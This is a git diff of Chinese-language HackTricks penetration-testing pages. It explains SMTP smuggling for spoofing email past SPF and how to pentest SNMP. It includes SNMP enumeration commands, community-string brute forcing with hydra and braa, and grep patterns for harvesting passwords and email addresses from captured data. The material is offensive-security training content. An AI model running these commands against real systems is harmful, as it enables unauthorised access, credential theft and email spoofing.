* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

52
network-services-pentesting/pentesting-smtp/smtp-smuggling.md
View file

@ -1,59 +1,61 @@
# SMTP走私
# SMTP Smuggling
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 基本信息
这种类型的漏洞最初是在[**这篇文章中发现的**](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/)文章中解释了当结束电子邮件时可以利用SMTP协议解释的差异来走私更多的电子邮件使攻击者能够在合法电子邮件的正文中走私更多的电子邮件从而可以冒充受影响域的其他用户例如admin@outlook.com绕过SPF等防御措施。
这种类型的漏洞最初是在 [**这篇文章中发现的**](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/),文中解释了在最终确定电子邮件时,**利用 SMTP 协议解释中的差异进行攻击**是可能的,这允许攻击者在合法邮件的正文中走私更多邮件,从而冒充受影响域的其他用户(例如 admin@outlook.com绕过 SPF 等防御措施。
### 为什么
这是因为在SMTP协议中要发送的电子邮件的**消息数据**由用户(攻击者)控制,攻击者可以发送经过特殊设计的数据,滥用解析器中的差异,从而在接收端走私额外的电子邮件。看一下原始文章中的这个示例:
这是因为在 SMTP 协议中,**要发送的邮件数据**由用户(攻击者)控制,攻击者可以发送特别构造的数据,利用解析器之间的差异,在接收方走私额外的邮件。请查看原始文章中的这个示例:
<figure><img src="../../.gitbook/assets/image (8) (1).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure>
### 如何
为了利用这个漏洞,攻击者需要发送一些数据,使**出站SMTP服务器认为只有1封电子邮件而入站SMTP服务器认为有多封电子邮件**。
为了利用这个漏洞,攻击者需要发送一些数据,使得**出站 SMTP 服务器认为这只是 1 封邮件,但入站 SMTP 服务器认为有多封邮件**。
研究人员发现,不同的**入站服务器将不同的字符视为电子邮件消息的结束**,而出站服务器则不会。\
例如,常规的数据结尾是`\r\n.\r\n`。但是如果入站SMTP服务器还支持`\n.\n`,攻击者可以在他的电子邮件中添加**该数据并开始指示新的SMTP命令**,就像在前面的图像中一样走私
研究人员发现,不同的**入站服务器将不同的字符视为邮件消息数据的结束**,而出站服务器则不这样认为。\
例如,常规的数据结束是 `\r\n.\r\n`。但是,如果入站 SMTP 服务器也支持 `\n.\n`,攻击者可以在其邮件中添加**该数据,并开始指示新的 SMTP 命令**以走私它,就像在前面的图像中一样。
当然,这只有在**出站SMTP服务器不将这些数据**视为消息数据的结尾时才能起作用因为在这种情况下它将看到2封电子邮件而不是1封因此最终这就是在这个漏洞中被滥用的不同步。
当然,这只有在**出站 SMTP 服务器也不将这些数据视为消息数据的结束**时才有效,因为在这种情况下,它将看到 2 封邮件而不是 1 封,因此最终这是在此漏洞中被滥用的不同步。
潜在的不同步数据:
* `\n.\n`
* `\n.\r\n`
还要注意,由于如果您从`user@outlook.com`的电子邮件中走私`admin@outlook.com`的电子邮件,**发件人仍然是`outlook.com`**因此绕过了SPF。
还要注意,SPF 被绕过,因为如果你从 `user@outlook.com` 走私一封来自 `admin@outlook.com` 的邮件,**发件人仍然是 `outlook.com`。**
## **参考资料**
## **参考文献**
* [https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

200
network-services-pentesting/pentesting-snmp/README.md
View file

@ -1,22 +1,23 @@
# 161,162,10161,10162/udp - 渗透测试 SNMP
# 161,162,10161,10162/udp - Pentesting SNMP
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对 **黑客职业** 感兴趣并想要黑掉不可能黑掉的东西 - **我们正在招聘!**(需要流利的波兰语书面和口语表达能力)。
如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_要求流利的波兰语书写和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -28,102 +29,102 @@ PORT STATE SERVICE REASON VERSION
161/udp open snmp udp-response ttl 244 ciscoSystems SNMPv3 server (public)
```
{% hint style="info" %}
SNMP还使用**162/UDP**端口进行**陷阱**。这些是从SNMP服务器发送到客户端的数据**包,而无需明确请求**
SNMP 还使用端口 **162/UDP** 进行 **traps**。这些是 **从 SNMP 服务器发送到客户端的数据包,而无需明确请求**
{% endhint %}
### MIB
为了确保SNMP访问跨制造商和不同的客户端-服务器组合工作,创建了**管理信息库MIB**。MIB是一种**独立的格式,用于存储设备信息**。MIB是一个**文本**文件,其中列出了设备的所有可查询**SNMP对象**,按照**标准化**的树形层次结构。它至少包含一个`对象标识符OID`,除了必要的**唯一地址**和**名称**外,还提供有关各个对象的类型、访问权限和描述的信息。\
MIB文件以基于ASCII文本格式的`抽象语法表示一``ASN.1`)编写。**MIB不包含数据**,但它们解释了**在哪里找到哪些信息**以及其外观为特定OID返回值或使用了哪种数据类型。
为了确保 SNMP 访问在不同制造商和不同客户端-服务器组合之间正常工作,创建了 **管理信息库 (MIB)**。MIB 是 **存储设备信息的独立格式**。MIB 是一个 **文本** 文件,其中列出了设备的所有可查询 **SNMP 对象**,以 **标准化** 的树形层次结构呈现。它至少包含一个 `对象标识符` (`OID`),该标识符除了必要的 **唯一地址****名称** 外,还提供有关类型、访问权限和相应对象描述的信息。\
MIB 文件采用 `抽象语法标记一` (`ASN.1`) 基于 ASCII 文本格式编写。**MIB 不包含数据**,但它们解释了 **在哪里找到哪些信息** 以及它们的外观,返回特定 OID 的值,或使用哪种数据类型。
### OIDs
**对象标识符OIDs**起着至关重要的作用。这些唯一标识符旨在管理**管理信息库MIB**中的对象。
**对象标识符 (OIDs)** 起着至关重要的作用。这些唯一标识符旨在管理 **管理信息库 (MIB)** 中的对象。
MIB对象ID或OID的最高级别分配给不同的标准制定组织。在这些顶级中建立了全球管理实践和标准的框架。
MIB 对象 ID OID 的最高级别分配给不同的标准制定组织。在这些顶级中,建立了全球管理实践和标准的框架。
此外,供应商被授予建立私有分支的自由。在这些分支中,他们有**自主权包括与其产品线相关的受管理对象**。这个系统确保了对跨不同供应商和标准的各种对象进行识别和管理的结构化和组织化方法
此外,供应商被授予建立私有分支的自由。在这些分支中,他们有 **自主权来包含与其自身产品线相关的管理对象**。该系统确保在不同供应商和标准之间有一个结构化和有组织的方法来识别和管理各种对象
![](<../../.gitbook/assets/SNMP\_OID\_MIB\_Tree (1).png>)
您可以从这里通过网络**导航**到**OID树**[http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus),或者通过访问[http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1) **查看OID的含义**(如`1.3.6.1.2.1.1。\
有一些**众所周知的OID**,比如[1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1)引用了MIB-2定义的简单网络管理协议SNMP变量。从**从这个OID挂起的OID**中,您可以获取一些有趣的主机数据(系统数据、网络数据、进程数据...
您可以通过此网站 **浏览** **OID 树**: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) 或 **查看 OID 的含义**(如 `1.3.6.1.2.1.1`)访问 [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1)。\
有一些 **众所周知的 OID**,例如 [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) 中的 OID引用了 MIB-2 定义的简单网络管理协议 (SNMP) 变量。从 **此 OID 的待处理 OID** 中,您可以获取一些有趣的主机数据(系统数据、网络数据、进程数据...
### **OID示例**
### **OID 示例**
[**这里的示例**](https://www.netadmintools.com/snmp-mib-and-oids/):
[**来自这里的示例**](https://www.netadmintools.com/snmp-mib-and-oids/)
**`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`**
是该地址的分解。
以下是该地址的分解。
* 1 - 这被称为ISO它建立了这是一个OID。这就是为什么所有OID都以“1”开头
* 3 - 这被称为ORG用于指定构建设备的组织。
* 6 - 这是dod或国防部是首次建立互联网的组织。
* 1 - 这是互联网的价值,表示所有通信将通过互联网进行。
* 4 - 此值确定此设备由私人组织制造,而不是政府组织。
* 1 - 此值表示设备由企业或商业实体制造
* 1 这称为 ISO表明这是一个 OID。这就是所有 OID 以“1”开头的原因。
* 3 这称为 ORG用于指定构建设备的组织。
* 6 这是 dod 或国防部,它是最早建立互联网的组织。
* 1 这是互联网的值,表示所有通信将通过互联网进行。
* 4 该值确定该设备是由私营组织制造的,而不是政府组织。
* 1 该值表示该设备是由企业或商业实体制造的
这前六个值对所有设备来说通常是相同的它们为您提供了关于它们的基本信息。这些数字序列对所有OID来说都是相同的,除非设备是由政府制造的。
这前六个值对于所有设备通常是相同的,它们提供了关于设备的基本信息。这个数字序列对于所有 OID 都是相同的,除非设备是由政府制造的。
接下来是下一组数字。
* 1452 - 给出制造此设备的组织的名称。
* 1 - 解释设备类型。在这种情况下,它是一个闹钟。
* 2 - 确定此设备是远程终端单元。
* 1452 给出制造该设备的组织名称。
* 1 解释设备的类型。在这种情况下,它是一个闹钟。
* 2 确定该设备是一个远程终端单元。
其余的值提供有关设备的具体信息。
* 5 - 表示离散报警点。
* 1 - 设备中的特定点
* 3 - 端口
* 21 - 端口地址
* 1 - 端口的显示
* 4 - 点号
* 7 - 点的状态
* 5 表示一个离散的报警点。
* 1 设备中的特定点
* 3 端口
* 21 端口的地址
* 1 端口的显示
* 4 点号
* 7 点的状态
### SNMP版本
### SNMP 版本
SNMP有两个重要版本:
有两个重要的 SNMP 版本:
* **SNMPv1**:主要版本,仍然是最常见的,**认证基于字符串**(社区字符串),以**明文**传输(所有信息都以明文传输)。**版本2和2c**也以**明文**发送流量,并使用**社区字符串作为认证**
* **SNMPv3**:使用更好的**认证**形式,信息传输**加密****字典攻击**可能会被执行但要找到正确的凭据比在SNMPv1和v2中困难得多)。
* **SNMPv1**:主要版本,仍然是最常见的,**身份验证基于字符串**(社区字符串),以 **明文** 形式传输(所有信息以明文形式传输)。**版本 2 和 2c** 也以 **明文** 发送 **流量**,并使用 **社区字符串作为身份验证**
* **SNMPv3**:使用更好的 **身份验证** 形式,信息以 **加密** 形式传输(可以进行 **字典攻击**,但找到正确的凭据比在 SNMPv1 和 v2 中要困难得多)。
### 社区字符串
如前所述,**为了访问MIB上保存的信息您需要了解版本1和2/2c上的社区字符串以及版本3上的凭据。**\
有**2种类型的社区字符串**
如前所述,**要访问保存在 MIB 上的信息,您需要知道版本 1 和 2/2c 的社区字符串,以及版本 3 的凭据。**\
**2 种类型的社区字符串**
* **`public`** 主要是**只读**功能
* **`private`** 通常是**读/写**
* **`public`** 主要是 **只读** 功能
* **`private`** **读/写** 一般
请注意,**OID的可写性取决于使用的社区字符串**,因此**即使**发现正在使用“**public**”,您也可能能够**写入一些值**。此外,**可能**存在始终为“只读”的对象。\
如果尝试**写入**一个对象,则会收到**`noSuchName`或`readOnly`错误**。
请注意,**OID 的可写性取决于使用的社区字符串**,因此 **即使** 您发现使用了“**public**”,您也可能能够 **写入某些值**。此外,可能存在 **始终为“只读”** 的对象。\
如果您尝试 **写入** 一个对象,将收到 **`noSuchName``readOnly` 错误**\*\*.\*\*
在版本1和2/2c中如果使用**错误的**社区字符串,服务器将不会**响应**。因此,如果它响应了,就是使用了**有效的社区字符串**
在版本 1 和 2/2c 中,如果您使用 **错误** 的社区字符串,服务器将不会 **响应**。因此,如果它响应,则使用了 **有效的社区字符串**
## 端口
[来自维基百科](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol):
[来自维基百科](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol)
* SNMP代理在UDP端口**161**上接收请求。
* 管理器在端口**162**上接收通知([陷阱](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap)和[InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest))。
* 当与[传输层安全性](https://en.wikipedia.org/wiki/Transport\_Layer\_Security)或[数据报传输层安全性](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security)一起使用时,请求在端口**10161**上接收,通知发送到端口**10162**。
* SNMP 代理在 UDP 端口 **161** 上接收请求。
* 管理器在端口 **162** 上接收通知([Traps](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap) [InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest))。
* 当与 [传输层安全性](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) [数据报传输层安全性](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security) 一起使用时,请求在端口 **10161** 上接收,通知发送到端口 **10162**
## 暴力破解社区字符串v1和v2c
## 暴力破解社区字符串 (v1 和 v2c)
**猜测社区字符串**,您可以执行字典攻击。查看[这里不同的方法来对SNMP执行暴力破解攻击](../../generic-methodologies-and-resources/brute-force.md#snmp)。一个使用的社区字符串是`public`。
**猜测社区字符串**,您可以执行字典攻击。查看 [这里不同的方法以对 SNMP 执行暴力攻击](../../generic-methodologies-and-resources/brute-force.md#snmp)。一个常用的社区字符串是 `public`
## 枚举SNMP
## 枚举 SNMP
建议安装以下内容以查看从设备收集的**每个OID的含义**
建议安装以下内容以查看从设备收集的 **每个 OID 的含义**
```bash
apt-get install snmp-mibs-downloader
download-mibs
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf
```
如果您知道一个有效的团体字符串,您可以使用 **SNMPWalk****SNMP-Check** 访问数据:
如果您知道有效的社区字符串,您可以使用 **SNMPWalk****SNMP-Check** 访问数据:
```bash
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
snmpbulkwalk -c public -v2c 10.10.11.136 .
@ -139,38 +140,40 @@ nmap --script "snmp* and not snmp-brute" <target>
braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID
```
由于扩展查询download-mibs的存在可以使用以下命令进一步枚举系统信息:
感谢扩展查询download-mibs可以使用以下命令枚举更多关于系统的信息:
```bash
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
```
**SNMP** 包含许多关于主机的信息,您可能会发现感兴趣的内容包括:**网络接口**IPv4 和 **IPv6** 地址)、用户名、正常运行时间、服务器/操作系统版本以及正在运行的 **进程**(可能包含密码)....
**SNMP** 有很多关于主机的信息,您可能会发现有趣的内容包括:**网络接口**IPv4 和 **IPv6** 地址)、用户名、正常运行时间、服务器/操作系统版本,以及 **进程**
**运行中**(可能包含密码)....
### **危险设置**
在网络管理领域,确保全面监控和控制的关键是某些配置和参数
在网络管理领域,某些配置和参数是确保全面监控和控制的关键。
### 访问设置
两个主要设置允许访问完整的 OID 树,这是网络管理的关键组成部分:
两个主要设置使访问 **完整的 OID 树** 成为可能,这是网络管理中的一个关键组成部分:
1. 设置 **`rwuser noauth`** 允许无需身份验证即可完全访问 OID 树。这个设置很直接,允许无限制访问。
2. 为了更具体的控制,可以使用:
* **`rwcommunity`** 用于 **IPv4** 地址,以及
1. **`rwuser noauth`** 被设置为允许在不需要身份验证的情况下完全访问 OID 树。此设置简单明了,允许无限制访问。
2. 为了更具体的控制,可以使用以下方式授予访问权限
* **`rwcommunity`** 用于 **IPv4** 地址,
* **`rwcommunity6`** 用于 **IPv6** 地址。
这两个命令都需要一个 **community 字符串** 和相关的 IP 地址,无论请求的来源如何,都提供完全访问权限。
这两个命令都需要一个 **社区字符串** 和相关的 IP 地址,无论请求的来源如何,都提供完全访问权限。
### 用于 Microsoft Windows 的 SNMP 参数
### SNMP 参数用于 Microsoft Windows
一系列 **管理信息库MIB值** 用于通过 SNMP 监控 Windows 系统的各个方面:
一系列 **管理信息库 (MIB) 值** 被用于通过 SNMP 监控 Windows 系统的各个方面:
* **系统进程**:通过 `1.3.6.1.2.1.25.1.6.0` 访问,此参数允许监视系统中的活动进程。
* **正在运行程序**`1.3.6.1.2.1.25.4.2.1.2` 值用于跟踪当前正在运行的程序。
* **进程路径**:要确定进程正在从哪里运行,使用 `1.3.6.1.2.1.25.4.2.1.4` MIB 值。
* **存储单元**:通过 `1.3.6.1.2.1.25.2.3.1.4` 实现对存储单元的监视
* **系统进程**:通过 `1.3.6.1.2.1.25.1.6.0` 访问,此参数允许监控系统内的活动进程。
* **运行程序**`1.3.6.1.2.1.25.4.2.1.2` 值用于跟踪当前运行的程序。
* **进程路径**:要确定进程的运行位置,使用 `1.3.6.1.2.1.25.4.2.1.4` MIB 值。
* **存储单元**:通过 `1.3.6.1.2.1.25.2.3.1.4` 监控存储单元
* **软件名称**:要识别系统上安装的软件,使用 `1.3.6.1.2.1.25.6.3.1.2`
* **用户帐户**`1.3.6.1.4.1.77.1.2.25` 值允许跟踪用户帐户。
* **TCP 本地端口**:最后,`1.3.6.1.2.1.6.13.1.3` 用于监视 TCP 本地端口,提供有关活动网络连接的见解
* **用户账户**`1.3.6.1.4.1.77.1.2.25` 值允许跟踪用户账户。
* **TCP 本地端口**:最后,`1.3.6.1.2.1.6.13.1.3` 被指定用于监控 TCP 本地端口,提供对活动网络连接的洞察
### Cisco
@ -182,7 +185,7 @@ snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
## 从 SNMP 到 RCE
如果您拥有允许您在 SNMP 服务中 **编写值****字符串**,则可能可以滥用它来 **执行命令**
如果您拥有允许您 **写入值** 到 SNMP 服务的 **字符串**,您可能能够利用它来 **执行命令**
{% content-ref url="snmp-rce.md" %}
[snmp-rce.md](snmp-rce.md)
@ -190,49 +193,49 @@ snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
## **大规模 SNMP**
[Braa ](https://github.com/mteg/braa)是一个大规模 SNMP 扫描器。这样的工具的预期用途当然是进行 SNMP 查询 - 但与 net-snmp 中的 snmpwalk 不同,它能够同时查询数十甚至数百个主机,并且在单个进程中执行。因此,它消耗非常少的系统资源,并且扫描非常快速
[Braa](https://github.com/mteg/braa) 是一个大规模 SNMP 扫描器。此类工具的预期用途当然是进行 SNMP 查询——但与来自 net-snmp 的 snmpwalk 不同,它能够同时查询数十或数百个主机,并且在一个进程中。因此,它消耗的系统资源非常少,并且扫描速度非常快
Braa 实现了自己的 SNMP 栈,因此不需要像 net-snmp 这样的任何 SNMP 库
Braa 实现了自己的 SNMP 栈,因此不需要任何 SNMP 库,如 net-snmp
**语法:** braa \[Community-string]@\[SNMP 服务器的 IP]:\[iso id]
**语法:** braa \[社区字符串\]@\[\[SNMP 服务器的 IP\]:\[iso id\]
```bash
braa ignite123@192.168.1.125:.1.3.6.*
```
这可以提取大量的信息,无法手动处理
这可以提取大量您无法手动处理的信息
因此,让我们寻找最有趣的信息(来自[https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)
所以,让我们寻找最有趣的信息(来自 [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)
### **设备**
该过程始于从每个文件中提取**sysDesc MIB数据**1.3.6.1.2.1.1.1.0)以识别设备。这是通过使用**grep命令**来完成的:
该过程从每个文件中提取 **sysDesc MIB 数据** (1.3.6.1.2.1.1.1.0) 开始,以识别设备。这是通过使用 **grep 命令** 完成的:
```bash
grep ".1.3.6.1.2.1.1.1.0" *.snmp
```
### **识别私有字符串**
一个关键的步骤是识别组织使用的**私有社区字符串**,特别是在 Cisco IOS 路由器上。该字符串使得可以从路由器中提取**运行配置**。通常通过分析 SNMP Trap 数据中包含单词 "trap" 的内容来识别,可以使用 **grep 命令**
一个关键步骤是识别组织使用的 **私有社区字符串**,特别是在 Cisco IOS 路由器上。这个字符串使得从路由器中提取 **运行配置** 成为可能。识别通常依赖于分析 SNMP Trap 数据中包含 "trap" 的内容,使用 **grep 命令**
```bash
grep -i "trap" *.snmp
```
### **用户名/密码**
在 MIB 表中存储的日志被检查以查找**登录失败尝试**,这可能会意外地包括作为用户名输入的密码。搜索关键字,如 _fail_、_failed_ 或 _login_,以查找有价值的数据:
存储在 MIB 表中的日志会被检查以寻找 **失败的登录尝试**,这些尝试可能意外地包括作为用户名输入的密码。搜索关键词如 _fail_、_failed_ 或 _login_ 以找到有价值的数据:
```bash
grep -i "login\|fail" *.snmp
```
### **电子邮件**
### **Emails**
最后,要从数据中提取**电子邮件地址**,可以使用带有正则表达式的**grep命令**,重点关注与电子邮件格式匹配的模式:
最后,为了从数据中提取**电子邮件地址**使用带有正则表达式的**grep命令**,重点关注与电子邮件格式匹配的模式:
```bash
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
```
## 修改 SNMP 值
您可以使用 _**NetScanTools**_ 来**修改值**。您需要知道**私有字符串**才能这样做。
您可以使用 _**NetScanTools**_ **修改值**。您需要知道 **私有字符串** 才能做到这一点
## 欺骗
如果有一个 ACL 只允许一些 IP 查询 SMNP 服务,您可以在 UDP 数据包中欺骗其中一个地址并嗅探流量。
如果有一个 ACL 只允许某些 IP 查询 SNMP 服务,您可以在 UDP 数据包中伪造其中一个地址并嗅探流量。
## 检查 SNMP 配置文件
@ -240,9 +243,9 @@ grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
* snmpd.conf
* snmp-config.xml
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要黑入不可黑入的系统 - **我们正在招聘!**_需要流利的波兰语书面和口语表达能力_
如果您对 **黑客职业** 感兴趣并想要攻克不可攻克的 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -282,16 +285,17 @@ Command: hydra -P {Big_Passwordlist} -v {IP} snmp
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
